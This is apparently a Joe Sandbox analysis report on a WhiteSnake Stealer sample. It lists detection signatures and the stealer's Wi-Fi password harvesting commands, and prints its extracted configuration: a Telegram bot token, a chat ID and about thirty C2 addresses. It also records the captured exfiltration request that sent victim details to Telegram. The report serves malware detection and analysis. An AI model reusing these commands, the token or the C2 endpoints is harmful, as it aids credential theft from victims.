Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
73ybGtnYXx.exe

Overview

General Information

Sample name:73ybGtnYXx.exe
renamed because original name is a hash value
Original sample name:ea08b197bbe8bc874a5c65500db03bf2.exe
Analysis ID:1640529
MD5:ea08b197bbe8bc874a5c65500db03bf2
SHA1:3cbe0f9a6bb6c1600e196d3c2b54132c72ccce0d
SHA256:03423b8784cac66602f6dc04f6303668951e9c7280a80535a708d59e6cf82312
Tags:exeWhiteSnakeStealeruser-abuse_ch
Infos:

Detection

WhiteSnake Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 73ybGtnYXx.exe (PID: 4296 cmdline: "C:\Users\user\Desktop\73ybGtnYXx.exe" MD5: EA08B197BBE8BC874A5C65500DB03BF2)
    • cmd.exe (PID: 6200 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7336 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7352 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 7360 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7396 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7448 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7464 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 7472 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage"}
{"Version": "1.6.3.4", "Telegram C2": "https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=7259165684", "C2 urls": ["http://206.166.251.4:8080", "http://167.99.138.249:8080", "http://46.4.73.118:9000", "http://206.189.109.146:80", "http://194.164.198.113:8080", "http://45.82.65.63:80", "https://5.196.181.135:443", "http://95.216.147.179:80", "http://185.217.98.121:8080", "http://116.202.101.219:8080", "http://185.217.98.121:80", "http://159.203.174.113:8090", "http://107.161.20.142:8080", "https://192.99.196.191:443", "https://44.228.161.50:443", "https://154.9.207.142:443", "http://66.42.56.128:80", "http://8.219.110.16:9999", "https://138.2.92.67:443", "http://8.134.71.132:8082", "http://41.87.207.180:9090", "http://18.228.80.130:80", "http://168.138.211.88:8099", "http://47.110.140.182:8080", "http://129.151.109.160:8080", "http://101.43.160.136:8080", "http://101.132.223.26:8080", "http://101.126.19.171:80", "http://38.60.191.38:80", "http://47.96.78.224:8080", "https://101.126.19.171:443"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_WhiteSnakeYara detected WhiteSnake StealerJoe Security
    Process Memory Space: 73ybGtnYXx.exe PID: 4296JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: 73ybGtnYXx.exe PID: 4296JoeSecurity_WhiteSnakeYara detected WhiteSnake StealerJoe Security
        Process Memory Space: 73ybGtnYXx.exe PID: 4296JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\73ybGtnYXx.exe", ParentImage: C:\Users\user\Desktop\73ybGtnYXx.exe, ParentProcessId: 4296, ParentProcessName: 73ybGtnYXx.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 6200, ProcessName: cmd.exe
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\73ybGtnYXx.exe", ParentImage: C:\Users\user\Desktop\73ybGtnYXx.exe, ParentProcessId: 4296, ParentProcessName: 73ybGtnYXx.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 6200, ProcessName: cmd.exe
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 206.166.251.4, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\73ybGtnYXx.exe, Initiated: true, ProcessId: 4296, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49683

          Stealing of Sensitive Information

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\73ybGtnYXx.exe", ParentImage: C:\Users\user\Desktop\73ybGtnYXx.exe, ParentProcessId: 4296, ParentProcessName: 73ybGtnYXx.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 6200, ProcessName: cmd.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-17T12:27:16.291521+010020458681Successful Credential Theft Detected192.168.2.849683206.166.251.48080TCP
          2025-03-17T12:27:37.795494+010020458681Successful Credential Theft Detected192.168.2.849689167.99.138.2498080TCP
          2025-03-17T12:27:59.257897+010020458681Successful Credential Theft Detected192.168.2.86023346.4.73.1189000TCP
          2025-03-17T12:28:00.860262+010020458681Successful Credential Theft Detected192.168.2.860234206.189.109.14680TCP
          2025-03-17T12:28:22.291543+010020458681Successful Credential Theft Detected192.168.2.860235194.164.198.1138080TCP
          2025-03-17T12:28:43.671509+010020458681Successful Credential Theft Detected192.168.2.86023645.82.65.6380TCP
          2025-03-17T12:28:46.152010+010020458681Successful Credential Theft Detected192.168.2.86023895.216.147.17980TCP
          2025-03-17T12:28:46.887962+010020458681Successful Credential Theft Detected192.168.2.860239185.217.98.1218080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-17T12:28:48.548401+010018100071Potentially Bad Traffic192.168.2.860240149.154.167.220443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 73ybGtnYXx.exeAvira: detected
          Source: 73ybGtnYXx.exeMalware Configuration Extractor: WhiteSnake {"Version": "1.6.3.4", "Telegram C2": "https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=7259165684", "C2 urls": ["http://206.166.251.4:8080", "http://167.99.138.249:8080", "http://46.4.73.118:9000", "http://206.189.109.146:80", "http://194.164.198.113:8080", "http://45.82.65.63:80", "https://5.196.181.135:443", "http://95.216.147.179:80", "http://185.217.98.121:8080", "http://116.202.101.219:8080", "http://185.217.98.121:80", "http://159.203.174.113:8090", "http://107.161.20.142:8080", "https://192.99.196.191:443", "https://44.228.161.50:443", "https://154.9.207.142:443", "http://66.42.56.128:80", "http://8.219.110.16:9999", "https://138.2.92.67:443", "http://8.134.71.132:8082", "http://41.87.207.180:9090", "http://18.228.80.130:80", "http://168.138.211.88:8099", "http://47.110.140.182:8080", "http://129.151.109.160:8080", "http://101.43.160.136:8080", "http://101.132.223.26:8080", "http://101.126.19.171:80", "http://38.60.191.38:80", "http://47.96.78.224:8080", "https://101.126.19.171:443"]}
          Source: 73ybGtnYXx.exe.4296.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage"}
          Source: 73ybGtnYXx.exeVirustotal: Detection: 58%Perma Link
          Source: 73ybGtnYXx.exeReversingLabs: Detection: 71%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 0_2_00007FF936AA7BA1 CryptUnprotectData,0_2_00007FF936AA7BA1
          Source: unknownHTTPS traffic detected: 5.196.181.135:443 -> 192.168.2.8:60237 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:60240 version: TLS 1.2
          Source: 73ybGtnYXx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936AB01FDh0_2_00007FF936AAFF7E
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then dec eax0_2_00007FF936AA243A
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936AA4914h0_2_00007FF936AA4121
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936AB301Ah0_2_00007FF936AB2A8E
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936ABCBA4h0_2_00007FF936ABCA0B
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then dec eax0_2_00007FF936AACF1A
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936AA48E8h0_2_00007FF936AA4874
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936AA4914h0_2_00007FF936AA4874
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936AACF4Eh0_2_00007FF936AAC67F
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936AB301Ah0_2_00007FF936AB2E3D
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936AACF4Eh0_2_00007FF936AACB66
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936AA6E1Ch0_2_00007FF936AA6C19
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then dec eax0_2_00007FF936AB18EF
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936AAF398h0_2_00007FF936AAF12C
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 4x nop then jmp 00007FF936AB3731h0_2_00007FF936AB3261

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:49683 -> 206.166.251.4:8080
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60233 -> 46.4.73.118:9000
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60235 -> 194.164.198.113:8080
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60238 -> 95.216.147.179:80
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60236 -> 45.82.65.63:80
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:49689 -> 167.99.138.249:8080
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60234 -> 206.189.109.146:80
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60239 -> 185.217.98.121:8080
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:60240 -> 149.154.167.220:443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60233 -> 9000
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.8:49683 -> 206.166.251.4:8080
          Source: global trafficTCP traffic: 192.168.2.8:49689 -> 167.99.138.249:8080
          Source: global trafficTCP traffic: 192.168.2.8:60233 -> 46.4.73.118:9000
          Source: global trafficTCP traffic: 192.168.2.8:60235 -> 194.164.198.113:8080
          Source: global trafficTCP traffic: 192.168.2.8:60239 -> 185.217.98.121:8080
          Source: global trafficTCP traffic: 192.168.2.8:60223 -> 162.159.36.2:53
          Source: global trafficHTTP traffic detected: GET /bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=7259165684&text=%23Lebensborn2%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E358075%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.15Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.217.98.121%3A8080%2Fget%2FhX8i6V7aqg%2F2r1j6_user%40358075_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.217.98.121%3A8080%2Fget%2FhX8i6V7aqg%2F2r1j6_user%40358075_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35
          Source: unknownDNS query: name: ip-api.com
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: unknownTCP traffic detected without corresponding DNS query: 206.166.251.4
          Source: global trafficHTTP traffic detected: GET /bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=7259165684&text=%23Lebensborn2%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E358075%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.15Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.217.98.121%3A8080%2Fget%2FhX8i6V7aqg%2F2r1j6_user%40358075_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.217.98.121%3A8080%2Fget%2FhX8i6V7aqg%2F2r1j6_user%40358075_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: ip-api.com
          Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 17 Mar 2025 11:28:46 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.126.19.171:80
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.132.223.26:8080
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.43.160.136:8080
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.161.20.142:8080
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.101.219:8080
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.217.98.121:8080/get/hX8i6V7aqg/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.151.109.160:8080
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.174.113:8090
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249:8080
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249:8080/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249:8080/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249:80802(
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.138.211.88:8099
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.80.130:80
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:80
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080/2r1j6_user%40358075_report.wsr
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080/get
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080/get/hX8i6V7aqg/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080/hX8i6V7aqg/2r1j6_user
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:80802(
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.164.198.113
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.164.198.113:8080
